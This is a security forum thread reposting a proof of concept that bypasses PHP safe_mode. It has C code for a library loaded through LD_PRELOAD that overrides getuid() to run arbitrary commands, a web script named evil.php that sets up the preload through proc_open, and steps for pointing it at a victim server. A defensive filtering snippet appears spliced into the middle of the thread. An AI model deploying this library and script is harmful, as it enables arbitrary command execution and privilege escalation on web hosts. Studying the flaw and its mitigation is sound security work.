IT Security and Insecurity Portal
yet another way to bypass PHP safe_mode - LD_PRELOAD
Posted: Wed Dec 10, 2008 3:38 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
http://www.milw0rm.com/exploits/7393
Code:
-----------------------------------------------------------------------
+ safe-bypass-procopen.txt - yet another way to bypass PHP safe_mode. +
+ By Milen Rangelov <gat3way@gat3way.eu> +
-----------------------------------------------------------------------
This *should* work provided that you have met the following requirements:
1) A writable directory under documentroot to place those files (obviously)
2) You don't have proc_open in your disabled_functions list
3) You are able to compile a shared library on the same platform as the target web server.
The reason I'm publishing that is because I posted a similar bug (putenv()+mail())
which was titled as "Bogus" one by the PHP developers.
Now, this one uses quite the same concept, only different means.
How does this work?
-------------------
You will need to upload 2 files - one precompiled shared library and a php script.
Place them in the writable dir and just open http://victim/path/evil.php?c=arbitrarycommand
You'll need to change the $path variable to match the writable directory
Here is the library code, compile with cc -o a.so -fPIC -shared a.c
a.c:
----
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>   /* write(), uid_t */
/* Replacement for libc's getuid(): with the library preloaded, the dynamic
   loader resolves getuid() to this function, so it runs as soon as /bin/sh
   (which calls getuid() during startup) is executed. */
uid_t getuid(void)
{
char *buf=malloc(300);
FILE *a;
/* Drop LD_PRELOAD so the processes spawned below do not load this library again. */
unsetenv("LD_PRELOAD");
/* .comm holds the command string written by evil.php. */
a=fopen(".comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a);
/* Move the library aside while the command runs, then put it back. */
rename("a.so","b.so");
system(buf);
system("mv output.txt .comm1");
rename("b.so","a.so");
free(buf);
return 0;
}
*cut*
And that is the PHP script:
evil.php:
-------------------------
<?php
$path="/var/www"; //change to your writable path
$a=fopen($path."/.comm","w");
fputs($a,$_GET["c"]);
fclose($a);
$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("file", $path."/output.txt","w"),
2 => array("file", $path."/errors.txt", "a" )
);
$cwd = '.';
$env = array('LD_PRELOAD' => $path."/a.so");
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed
sleep(1);
$a=fopen($path."/.comm1","r");
echo "<pre><b>";
while (!feof($a))
{$b=fgets($a);echo $b;}
fclose($a);
echo "</pre>";
?>
*cut*
Yeah, I know, it's written pretty lame, it's just a PoC.
Why does that work?
-------------------
Because the PHP devs like to trust the environment. Especially the dynamic loader variables.
In the original bug I posted into their bugtracking system, I suggested that they clean them
in mail() for example, but....yuck the bug was classified as *bogus*.
This demonstrates exactly the same problem. If you have safe_mode enabled, you cannot
execute anything except the binaries in the safe mode exec dir. They prepend a trailing slash
to your command string and strip "..". Yet, proc_open() enables you to provide your own
environment to pass to the new process. proc_open() executes "/bin/sh -c yourcommand" and
even though yourcommand is invalid, the LD_PRELOAD is passed to /bin/sh.
/bin/sh loads your h4h0r library and then BOOM!
I hope you'd find that useful.
BTW....!!! Down with the arrogant programmers :DDD !!!
# milw0rm.com [2008-12-09]
Seems to be useful
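The bypass rests on proc_open() forwarding an attacker-controlled $env, loader variables included, to the child. One mitigation on the application side is to filter that array before it reaches proc_open(). This is an added example, not code from the milw0rm post or from PHP itself; the names safe_proc_open(), strip_loader_env() and is_loader_variable() are chosen here, and the sample environment at the bottom is constructed.

```php
<?php
// Added defensive example: wrap proc_open() so the $env argument can never
// carry dynamic-loader variables into the spawned /bin/sh.
// Function names below are this example's own, not PHP API.

// Prefixes honoured by the dynamic loader: glibc ld.so (LD_*) and macOS dyld (DYLD_*).
// Any of these lets the environment decide what code the child process loads.
const LOADER_ENV_PREFIXES = ['LD_', 'DYLD_'];

function is_loader_variable(string $name): bool {
    foreach (LOADER_ENV_PREFIXES as $prefix) {
        if (strncasecmp($name, $prefix, strlen($prefix)) === 0) {
            return true;
        }
    }
    return false;
}

// Returns $env without loader variables; the names that were removed are
// collected in $dropped so the caller can log them as an attempted abuse.
function strip_loader_env(array $env, array &$dropped = []): array {
    $clean = [];
    foreach ($env as $name => $value) {
        if (is_loader_variable((string) $name)) {
            $dropped[] = (string) $name;
            continue;
        }
        $clean[$name] = $value;
    }
    return $clean;
}

// Same parameters as proc_open(); an explicit $env is filtered first.
// Note that ini settings such as safe_mode_protected_env_vars only govern
// putenv(), not the $env array passed here, hence the explicit filter.
function safe_proc_open(string $cmd, array $descriptors, &$pipes, ?string $cwd = null, ?array $env = null) {
    $dropped = [];
    if ($env !== null) {
        $env = strip_loader_env($env, $dropped);
    }
    foreach ($dropped as $name) {
        error_log("safe_proc_open: refused to forward {$name} to child process");
    }
    return proc_open($cmd, $descriptors, $pipes, $cwd, $env);
}

// Constructed environment shaped like the one in the PoC above.
$attempt = ['PATH' => '/usr/bin:/bin', 'LD_PRELOAD' => '/var/www/a.so'];
$dropped = [];
print_r(strip_loader_env($attempt, $dropped));
print_r($dropped);
```

Disabling proc_open via disabled_functions, as the PoC's own requirement list notes, remains the simpler control where the function is not needed.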
Posted: Wed Dec 10, 2008 5:45 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Well, well. Look at the things the Bulgarians have started writing. Waraxe, have you tested this?
Posted: Wed Dec 10, 2008 6:17 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu
pexli wrote: | Well, well. Look at the things the Bulgarians have started writing. Waraxe, have you tested this?
Nope, not yet, but it seems reasonable idea. By the way, putenv() can be restricted in safe mode:
Code:
Setting certain environment variables may be a potential security breach. The safe_mode_allowed_env_vars directive contains a comma-delimited list of prefixes. In Safe Mode, the user may only alter environment variables whose names begin with the prefixes supplied by this directive. By default, users will only be able to set environment variables that begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty, PHP will let the user modify ANY environment variable!
The safe_mode_protected_env_vars directive contains a comma-delimited list of environment variables, that the end user won't be able to change using putenv(). These variables will be protected even if safe_mode_allowed_env_vars is set to allow to change them.
Anyway - this is one more piece in the puzzle of privilege escalation in php/shell
Posted: Wed Dec 10, 2008 6:39 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
In another thread he wrote that it works on PHP version 5.2.6. I have a few servers here running in safe mode. Need to test this marvel.
Posted: Thu Dec 11, 2008 6:16 pm
gat3way
Regular user
Joined: Dec 11, 2008
Posts: 5
So what happened?
Posted: Thu Dec 11, 2008 7:39 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
Honestly, I haven't tested it. Instead, why don't you spin up a little forum on your site so we can at least have a chat, because those comments over there are a hassle for me.
Posted: Thu Dec 11, 2008 7:52 pm
gat3way
Regular user
Joined: Dec 11, 2008
Posts: 5
I'd have to take on the role of moderator, and that is really not my thing.
Posted: Thu Dec 11, 2008 7:55 pm
pexli
Valuable expert
Joined: May 24, 2007
Posts: 665
Location: Bulgaria
I'll PM you so we don't make a mess here, since waraxe is a buddy of mine.
Posted: Sun Jan 27, 2013 5:46 pm
anandinvit
Regular user
Joined: Jan 26, 2013
Posts: 6
I am unable to understand the reply.